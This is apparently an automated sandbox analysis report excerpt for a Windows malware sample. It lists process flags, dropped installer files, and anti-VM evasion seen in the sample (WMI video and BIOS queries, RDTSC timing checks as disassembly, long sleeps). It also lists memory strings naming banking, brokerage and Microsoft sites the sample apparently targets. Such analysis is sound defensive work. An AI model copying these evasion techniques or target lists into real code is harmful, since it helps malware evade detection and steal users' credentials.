        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Query firmware table information (likely to detect VMs)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSystem information queried: FirmwareTableInformationJump to behavior
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BAD7C44
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BADF3E1 second address: 6BADF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BADF3FD second address: 6BADF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FC244FA7CE5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FC244FA7D70h 0x00000031 rdtsc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3815Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2733Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com TID: 4512Thread sleep time: -150000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 3815 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 2733 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drBinary or memory string: puQEMus
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
        Source: M.com, 0000000D.00000003.2453591367.00000000045D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
